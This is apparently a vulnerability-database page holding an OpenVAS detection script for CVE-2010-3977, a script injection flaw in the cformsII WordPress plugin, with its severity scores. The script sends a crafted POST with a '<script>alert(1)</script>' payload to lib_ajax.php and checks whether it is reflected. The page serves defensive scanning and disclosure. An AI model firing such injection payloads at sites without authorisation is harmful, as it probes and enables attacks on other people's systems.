Lucene search

K
openvasCopyright (C) 2010 Greenbone AGOPENVAS:1361412562310801628
HistoryNov 16, 2010 - 12:00 a.m.

WordPress Plugin cformsII 'lib_ajax.php' Multiple HTML Injection Vulnerabilities

2010-11-1600:00:00
Copyright (C) 2010 Greenbone AG
plugins.openvas.org
17

6.6 Medium

AI Score

Confidence

Low

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.004 Low

EPSS

Percentile

74.1%

cformsII WordPress Plugin is prone to multiple HTML injection vulnerabilities.

# SPDX-FileCopyrightText: 2010 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:wordpress:wordpress";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.801628");
  script_version("2023-10-27T05:05:28+0000");
  script_tag(name:"last_modification", value:"2023-10-27 05:05:28 +0000 (Fri, 27 Oct 2023)");
  script_tag(name:"creation_date", value:"2010-11-16 10:37:01 +0100 (Tue, 16 Nov 2010)");
  script_cve_id("CVE-2010-3977");
  script_tag(name:"cvss_base", value:"4.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_name("WordPress Plugin cformsII 'lib_ajax.php' Multiple HTML Injection Vulnerabilities");
  script_xref(name:"URL", value:"http://secunia.com/advisories/42006");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/44587");
  script_xref(name:"URL", value:"http://xforce.iss.net/xforce/xfdb/62938");
  script_xref(name:"URL", value:"http://www.conviso.com.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/");

  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2010 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("gb_wordpress_http_detect.nasl");
  script_mandatory_keys("wordpress/http/detected");
  script_require_ports("Services/www", 80);

  script_tag(name:"impact", value:"Successful exploitation will allow attacker to execute arbitrary
  code in the context of the application.");
  script_tag(name:"affected", value:"WordPress plugin cforms Version 11.5 and earlier.");
  script_tag(name:"insight", value:"The flaws are caused by improper validation of user-supplied
  input passed via the 'rs' and 'rsargs' parameters to
  wp-content/plugins/cforms/lib_ajax.php, which allows attackers to execute
  arbitrary HTML and script code on the web server.");
  script_tag(name:"solution", value:"Update to cforms Version 11.6.1 or later.");
  script_tag(name:"summary", value:"cformsII WordPress Plugin is prone to multiple HTML injection vulnerabilities.");

  script_tag(name:"qod_type", value:"remote_analysis");

  script_tag(name:"solution_type", value:"VendorFix");

  script_xref(name:"URL", value:"http://www.deliciousdays.com/cforms-plugin/");
  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");

if(!port = get_app_port(cpe:CPE, service:"www"))
  exit(0);

if(!dir = get_app_location(cpe:CPE, port:port))
  exit(0);

if(dir == "/")
  dir = "";

url = dir + "/wp-content/plugins/cforms/lib_ajax.php";
useragent = http_get_user_agent();

# nb: http_host_name() should be always after the static string(s) above but always after any
# dynamically ones (e.g. a random string) which should be different for each hostname.
hostname = http_host_name(port:port);

req = string("POST ", url, " HTTP/1.1\r\n",
             "Host: ", hostname, "\r\n",
             "User-Agent: ", useragent, "\r\n",
             "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n",
             "Content-Length: 92\r\n\r\n",
             "rs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$#",
             "$<script>alert(1)</script>\r\n");
res = http_keepalive_send_recv(port:port, data:req);

if(('<script>alert(1)</script>' >< res) &&
    egrep(pattern:"^HTTP/1\.[01] 200", string:res)) {
  report = http_report_vuln_url(port:port, url:url);
  security_message(port:port, data:report);
  exit(0);
}

exit(99);

6.6 Medium

AI Score

Confidence

Low

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.004 Low

EPSS

Percentile

74.1%